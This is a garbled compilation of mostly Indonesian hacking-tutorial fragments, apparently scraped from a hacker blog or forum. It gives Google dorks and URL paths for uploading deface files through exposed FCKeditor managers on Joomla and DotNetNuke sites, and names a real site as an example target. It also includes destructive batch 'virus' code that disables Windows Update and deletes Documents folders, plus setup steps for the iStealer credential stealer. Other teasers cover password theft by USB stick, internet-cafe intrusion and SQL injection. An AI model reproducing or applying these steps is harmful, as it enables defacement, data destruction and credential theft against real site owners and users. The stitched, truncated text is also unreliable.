Joomla mambots File Upload Vulnerability

1. cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
2. kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
   ype=File&Connector=connectors/php/connector.php maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.

Deface Ala DotNetNuke Exploit

1. Siapkan file deface anda

2.mencari target web
dork >> inurl:”/portals/0″
search di google...!!

3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.sitetarget.org/portals/0/News.htm << Target sekarang ganti "portals/0/News.htm" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Teknik Deface dengan menggunakan Web Folder

Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu.
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste.

Yahoo Mail Crack

|–[2. Bugs pada Yahoo Mail
—————————
Yahoo Mail (http://mail.yahoo.com) memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan mailbox yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!
Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:

XSS Attack

XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. XSS mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan XSS hanya membutuhkan sebuah browser saja.

Cara Mudah Menjebol Password Deep Freeze 6

Sesuai dengan dinamika dan perkembangan jaman - banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.

10 Good Features For Batch Virus

F 1:

Disable Windows Update:
Code:
@echo off
net stop "wuauserv"


F 2:

Delete "My Documents" folder:
Code:
@echo off
del /f /q "%userprofile%\My Documents\*.*"
del /f /q "%userprofile%\Documents\*.*"

Dasar SQL Injection

A) PendahuluanSQL Injection di PHP tentu berbeda.
Yang harus diketahui sebelum sql injection pada php adalah di depan sama dengan (=) ditambahkan tanda minus (id=-).
Itu artinya sama dengan 1=2 agar id tersebut bernilai error.
Dan di belakang menggunakan tanda /* sama artinya dengan tanda --,# yang menandakan akhir perintah.

Sekarang saya akan memberikan 1 contoh website.
Tapi sebelum melangkah lebih jauh, ada baiknya kita juga mempelajari cara mencari targetnya.
Untuk itu kita lebih dahulu harus mengerti dari special syntax yang ada pada Google.

Tutorial IStealer 6.0

STEP 1:
First, we will need to setup the PHP panel. To do that, we need hosting website.

I suggest you this one:
http://www.blackapplehost.com/

Click Register to make new account.

STEP 2:
When you finish with registration, go to UserCP.
Then, you will need to create a new MySQL Database by clicking Create/delete MySQL database.

Batch Virus

-Right You All Know What A Batch Virus Is?
Its A Series Of Commands Generally Made Into A .Bat File,
You Can Make Serious Problems With Them.

IVe Posted This So I Can Show You Some,
A Couple I Copied (Sorry) But Il Give You Rep And Dedication I Just Thought Id Put Them Together With Some Others So There Arent All These Batch Codes All Over The Place. Have Fun.

Instructions:
Step One: Open Up Notepad (Start>All Programmes>Accesories>Notepad)
Step Two: Copy And Paste My Codes Onto The Page
Step Three: Save As *Name Of Choice*.Bat

WARNING: Notice How It Ends At Step Three? Cause What You Do With Them Is Uptoo YOU And YOU Only.

Cara Mengetahui Ip Address Seseorang Hanya Dengan Link

Ini hanya salah satu trik yang dilakukan para hackers untuk menjebak korbannya untuk mengetahui IP address si korban.

mungkin menurut saya, tutorial ini sudah banyak dibahas di situs/forum lain. Jika mungkin benar, mungkin saya hanya mengulas sedikit caranya.

Berikut Langkah² untuk mengetahui IP Address seseorang hanya dengan Link:

RFI & LFI

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Code:

include();
include_once();
require();
require_once();

SQL Injection Step by Step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

Mencuri Password Menggunakan USB Disk

Pengen Tau password nya temen kita? atau password-password yg ke save di warnet-warnet?, hehehe..tips kali ini bisa membantu kita untuk mengambil password yg ada di komputer orang lain dengan menggunakan bantuan USB, tepatnya menggunakan Flashdisk. Cara nya sangat mudah sekali. yg pasti modal utama kita adalah Flashdisk dan komputer target yg ingin kita ambil password nya.

Tips kali ini, kita menggunakan tools yg nanti nya akan merecord (save) data pribadi dari komputer target kita. tools ini baru bisa mengambil data dari Browser Mozila Firefox, YM, dan Outlook. langsung aja ya ke step-step nya :

Cara Menguasai Server Warnet

Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat
seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

Software Penjebol Password RAR dan WinRar

Pas gw lgi Googling gw nemu ini :

Gunanya tuk menjebol password RAR & WinRar, klo pengen nyoba lngsung z download disini

Cara Mencuri Data Dari Flash Disk

Penggunaan flashdisk, saat ini, telah menjadi suatu barang yang sangat umum untuk digunakan. Baik untuk menyimpan file-file yang bersifat tidak penting hingga yang super penting.
Penggunaan flashdisk yang semakin umum ini, disebabkan oleh semakin murahnya harga sebuah flashdisk dan semakin besar kemampuan menyimpan data serta sifat mobilitasnya yang sangat tinggi.
Sifat yang terakhir tadi, mengakibatkan pemakaian flashdisk lebih beresiko. Apalagi menyimpan data-data penting dan rahasia.

Berikut cara-cara yang sering digunakan untuk mencuri data-data dari flashdisk.
Tool yang dibutuhkan:

Cara Nyedot Bandwidht

Ada banyak cara untuk mengakali koneksi internet yang lambat, apalagi Anda menggunakan akses internet di warnet-warnet yang kebanyakan mereka telah membatasi bandwidth setiap komputernya. Berikut adalah beberapa tips dan trik yang bisa Anda coba :
1). Buka Browser Mozilla Firefox
2). Pada Address Bar Ketik : ABOUT:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)
contoh menggantingnya :